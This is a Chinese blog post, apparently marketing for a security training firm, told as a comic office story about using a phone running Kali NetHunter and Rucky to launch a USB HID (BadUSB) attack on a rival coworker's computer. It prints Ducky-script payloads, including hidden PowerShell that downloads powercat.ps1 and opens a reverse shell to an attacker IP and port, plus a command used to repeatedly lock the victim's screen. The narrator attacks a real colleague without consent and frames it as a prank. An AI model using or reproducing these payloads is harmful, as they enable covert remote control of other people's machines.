网盾科技IT教育,只培训技术精英
全国免费咨询电话: 15827351614
近源渗透实操之一夜回到解放前

万恶起源

前段时间看了一篇手机安装kali linux nethunter的文章 ,于是突发奇想把自己的手机改装成kali nethunter,然后...诶??有点不对劲,那我还能打电话聊微信撩公司隔壁桌的小芳吗?

无奈下提前向老板预支工资,买了一部新手机,计算机算,下个月每天啃馒头也能勉强度日,说不定小芳看我可怜还会分给我一点午饭,计划通!

可是小芳同桌的那个男同事特别碍眼,总是在我的小芳面前刷存在,看着我手上的改装手机,我微微一笑,受害者get。

我准备使用kali nethunter 的HID attack功能插上usb数据线,获取shell,对这个讨厌的情敌进行锁屏。

声明:本文仅用于技术讨论,严禁用于任何非法用途,违者后果自负,与本站及作者无关。

有些小伙伴对于操作存在一些疑问,我把某些技术的详解写在下面。

1 近源渗透测试

它是一种集常规网络攻防、物理接近、社会工程学及无线电通信攻防等能力于一体的高规格网络安全评估行动。通过其内部各种潜在攻击面(如Wi-Fi网络、RFID门禁、暴露的有线网口、USB接口等)获得“战果”。

2 kali nethunter

它是一款专为渗透测试人员打造的,基于安卓的渗透测试平台。Kali Nethunter是一款用于安全研究的手机固件包,可以使Android设备增加“无线破解”、“HID攻击”、“伪造光驱”等的硬件功能以及metasploit等软件工具,目前官方只支持少量的Android手机,然而,通过重新编译Kali Nethunter源代码,可以将其编译到其他型号的手机上。

3 HID attack

它是最近几年流行的一类攻击方式。HID是Human Interface Device的缩写,意思是人机接口设备。它是对鼠标、键盘、游戏手柄这一类可以操控电脑设备的统称。由于电脑对这类设备缺少严格的检测措施,只是简单的识别设备类型,就允许设备对电脑进行各项操作。所以,通过修改篡改设备反馈信息,就可以很轻松的让电脑将其他设备误认为HID设备,从而获取控制权限。尤其是USB和蓝牙这类即插即用接口出现,导致HID Attack成为重要方式。例如,Bad USB就是USB类攻击的典型代表。Kali Linux NetHunter以手机作为硬件平台,支持常见的各种HID Attack。用户只要将手机通过USB线连接到主机上,就可以执行各种攻击,而且不会被系统拦截。

准备工作(POC)

本次使用的工具为 kali nethunter商店的中rucky 、nethunter、与连接kali的终端

本文使用的是在F-Droid商店 安装Rucky,用于当中Badusb的功能,模拟了橡皮鸭的功能,也就是HID attack。

我们打开Rucky,对模拟代码的编辑。*根据橡皮鸭的语法:

https://www.bilibili.com/read/cv5472965

代码如下:模拟键盘win+r,延迟500ms,输入字符串cmd,因系统装有中文输入法,所以需要两次回车。

GUI rDELAY 500STRING cmdENTERENTER

效果如下

有了POC 后,我们需要准备获取他的shell,在获取shell的基础之上,再对他的屏幕锁屏。
下面代码为:打开win+r,按shift键切换中英文,并发送powershell代码,获取shell

GUI rDELAY 500SHIFT ONDELAY 500STRING PowerShell.exe -WindowStyle Hidden -Command "IEX (New-Object System.Net.Webclient).DownloadString('https://xxxxx/powercat.ps1');powercat -c 192.168.43.174 -p 4444 -e cmd"ENTERENTER

受害者的受袭过程

由于我是一个对自己很有自信的男人,我还是希望能以我的男性魅力征服小芳,所以这次简单的逗一逗这个情敌

我努力玩了一早上手机直到快没有电,然后悠悠走到情敌面前,卖了个萌:“阁阁,伦家手机没电电了啦~借你的电脑插一插啦~”然后走到他办公桌插入他的电脑usb接口。他正在办公上网,一脸不可置信,却又透露出一抹异样的微笑。

不过还有一个问题,HID攻击的时候,会自动在屏幕上输出代码。所以我还需要转移他的注意力让他远离电脑屏幕。恰好我给小芳买的奶茶外卖及时送到了,外卖员一喊小芳女士的外卖,他立刻献殷勤说他去拿,这中间的十几秒恰好够我发挥。

再等他回来,没有意外我已经运行完了代码。接下就是见证奇迹的时刻了,这波操作一定会让我在小芳心里的形象更加伟岸。于是我默默的拔出数据线回到自己的座位。

以下为锁屏命令:

rundll32.exe user32.dll,LockWorkStation

他一开机我就运行命令给他锁屏,再开我再锁。他一脸懵逼望着电脑以为是电脑坏掉了,准备重启。这时小芳也注意到了他电脑的问题,然后回头看了看我正在一脸淫笑,她好像明白了......

我更得意了,明天小芳会不会主动提出和我约会?

下班回家后

一回家我就听到手机微信嘟嘟的响声,我大喜,不出意外就是小芳真的被我吸引了,爱上我想和我约会了。我从卫生间冲出来拿起手机,果然是小芳,赶紧开微信看她说了什么。

??虽然芳芳果然见识到了我的厉害,可是干嘛让我去查副总的手机?还没等我问,芳芳又发来一句。

......哦,我明白了

呵,什么狗屁女神,不过是我为他人做嫁衣!我呸!想黑人家手机,不知道违法吗!我回到卫生间继续洗澡,边洗边悠悠的回复:“黑手机是违法的,不过你可以去网盾网络安全攻城狮培训学学网络安全,web渗透什么的,吸引副总注意。”

终究,我没说狠话。

本次恶作剧告诉我们千万不要让让陌生人用u盘或看着像数据线的东西插入你的电脑,另外,没学网络安全我只是一个单身屌丝,学习了这些技术,我就算单身,也是单身 贵族